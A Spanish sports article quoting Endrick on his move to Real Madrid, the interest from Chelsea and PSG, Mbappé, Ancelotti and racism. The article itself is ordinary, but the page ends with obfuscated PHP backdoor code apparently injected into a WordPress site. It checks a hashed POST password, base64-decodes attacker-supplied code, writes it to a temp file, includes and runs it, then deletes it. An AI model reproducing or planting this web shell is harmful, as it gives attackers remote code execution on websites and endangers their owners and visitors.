“Me atrajo la Premier”

El futuro delantero del Real Madrid asegura que el PSG y el Chelsea lo intentaron fichar, pero siempre tuvo claro que quería vestir de blanco.

Endrick es la gran esperanza del Real Madrid. El delantero brasileño está brillando en el Palmeiras, y este fin semana pasado estuvo en Madrid disfrutando de sus vacaciones, donde tuvo la oportunidad de conocer a sus futuros compañeros, a Florentino y disfruto del partido del Madrid ante el Villarreal en el Bernabéu. De vuelta a Brasil, en una entrevista para el diario inglés The Athletic, el jugador repasa su paso por Madrid: “Habíamos planeado durante mucho tiempo que iría a Madrid para visitar Valdebebas y a mis futuros compañeros de equipo. Vivir el partido ante el Villarreal en el nuevo Santiago Bernabéu y hablar con Florentino fue increíble”, empezó hablando el brasileño.

Hace justo un año el Madrid logró su fichaje, pero tuvo que pelear con otros equipos para hacerse con la futura estrella brasileña y él mismo asegura que había más equipos que intentaron convencerle: “En un momento se habló mucho de Haaland y Mbappé para el Madrid y fue entonces cuando hubo un gran interés por parte del Chelsea y el PSG en ficharme. Son equipos grandes e importantes. Hubieran sido excelentes opciones para mí. Me atrajo la Premier League, la ciudad de Londres y el hecho de que el inglés es el idioma dominante en el mundo. Y obviamente el Chelsea es una marca fuerte que ha ganado dos Champions. Me dijeron que en Londres llueve mucho, pero eso no sería un problema para mí porque, como decía mi padre, siempre me gustó jugar bajo la lluvia. Pero siempre le dejé claro a mi agente que mi sueño era el Real Madrid”.

Mbappé todavía no sabe donde jugará el año que viene y podría terminar llegando al Bernabéu. Endrick valora esa posible llegada y el poder jugar con sus compatriotas brasileños: “Siempre que haya jugadores de alto nivel dentro del equipo, el equipo se desarrollará mejor y, en consecuencia, podrá ganar en actitud, ¿no?. Así que lo que sea mejor para el Real Madrid y para todo el equipo, que se haga. Solo quiero ser feliz jugando al fútbol como siempre quise. Evidentemente, si puedo jugar con Vinicius Jr, Rodrygo o Kylian Mbappé será algo muy bueno. Pero Florentino y toda la gente que lo rodea saben qué hacer y que será mejor para el club”.

El delantero también habló sobre el futuro de Ancelotti, ya que su futuro sigue en el aire y le podría tener como entrenador en el Madrid o en la selección brasileña: “Donde esté feliz, donde se sienta bien, ahí es donde quiero que esté. Al menos para mí, no importa dónde vaya a estar, porque si va a ser feliz en el Real Madrid o si va a ser feliz en la selección brasileña, eso es lo importante y lo veré en mí equipo. Lo más importante es su felicidad como entrenador”.

Endrick asegura que desde que fichó por el Real Madrid están en continuo contacto y que el conjunto blanco se interesa mucho por su evolución y su estado físico y mental: “Juni viene a Brasil cada dos meses. Suele venir a mi casa, almorzamos y hablamos de fútbol, de mí, del Palmeiras, del Real Madrid y del fútbol mundial en general. Siempre me tranquiliza y me da confianza, incluso en los momentos más difíciles. Mi sueño siempre ha sido jugar en el Madrid. Mi papá siempre fue hincha y yo también. Me gustaría ganar cinco Champions y 10 Ligas”.

En esta nueva era, es fundamental tener una buena salud mental y saber llevar las críticas a través de las redes sociales. Endrick asegura que lo trabaja a diario al considerarlo fundamental para poder triunfar: “Tengo un fisioterapeuta, un entrenador personal, un consultor de redes sociales, un asesor de medios, un nutricionista y un chef. Se ocupan de mi salud mental, lo cual es maravilloso. No tengo psicólogo, pero hay uno en Palmeiras”.

Para terminar, Endrick habló sobre el racismo y los diferentes episodios que ha tenido que vivir Vinicius en los últimos años: “Mi mamá siempre me dijo que soy negro, que si la gente habla de eso no debería verlo como algo negativo, y mientras más hablen de eso será su mala suerte, porque les mostraré mi cara y no me afectará. Es algo que me entristece cuando veo lo que le pasa Vini Jr. Veo que él está feliz celebrando en la cancha, y también me gusta celebrar bailando, porque eso es Brasil, es fútbol con alegría. No creo que nada nos quite el brillo y que sigamos siendo felices y luchando contra el racismo” concluyó Endrick.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}